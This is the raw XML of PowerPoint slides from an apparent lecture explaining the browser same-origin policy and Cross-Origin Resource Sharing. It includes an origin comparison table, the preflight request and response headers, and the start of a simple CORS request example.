                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Only the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>path differs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="479195705"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>http://store.company.com/dir</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>/inner/another.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent6"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Same Origin</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Only the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>path differs</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1530470432"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>https://store.company.com/page.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Failure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Different </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>protocol</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2653598629"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>http://store.company.com:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>81</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>/dir/page.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Failure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Different </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>port </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>(http:// is port 80 by default)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3664102755"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>http://news.company.com/dir/page.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Failure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Different </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>host</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="30840477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http://store.different.com/dir/page.html</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Failure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Different </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>domain</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1574682659"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CBED8FC-C0BE-444A-91B3-C28B2B10BC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1251219" y="1295400"/>
            <a:ext cx="6641562" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Base URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://store.company.com/dir/page.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Table courtesy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MDN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3BC870C-BE62-4AA1-AD90-DF23E13A3B08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1586247" y="685800"/>
            <a:ext cx="5971507" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>Same-Origin Policy Examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C3CF57E-9CEF-4055-9EC7-E3E973E99C3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="2133600"/>
            <a:ext cx="5715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038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9B02-7484-4B51-8C5F-0CA9AA1034AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-Origin Resource Sharing (CORS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24707555-D2DE-47A6-A6E5-C76342C3AD05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="990600"/>
            <a:ext cx="8534400" cy="5170646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>CORS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> allows browsers to perform cross-origin GET and POST requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>CORS uses special headers to determine if servers should allow cross-origin requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>When a browser makes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>cross-origin request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>, it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Sets an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> header, with the domain name of the server initiating the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>When a server responds to this request, It will:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Read the value of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Set an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> header and fulfill the request if it recognizes the Origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Respond with an error if it does not recognize the Origin</a:t>
            </a:r>
            <a:endParaRPr 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5296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9B02-7484-4B51-8C5F-0CA9AA1034AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preflight Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24707555-D2DE-47A6-A6E5-C76342C3AD05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="990600"/>
            <a:ext cx="8534400" cy="4493538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Preflight requests use three headers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Request-Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Responses to preflight requests also use three headers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Headers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>These headers allow the client and server to negotiate: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Which resources can be exchanged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>How/Which HTTP methods can be used to transfer them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38891535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55160F-278D-4C52-B08B-0DBFBD078C04}"/>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373A733-1F34-437D-8D46-BFA2987C41FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="268069"/>
            <a:ext cx="5738815" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Simple CORS Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC808FF9-7529-4FD3-9E22-2C98B1ED386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-381000" y="1143000"/>
            <a:ext cx="6858000" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350">
            <a:noFill/>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/analytics.js HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: https://amazon.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
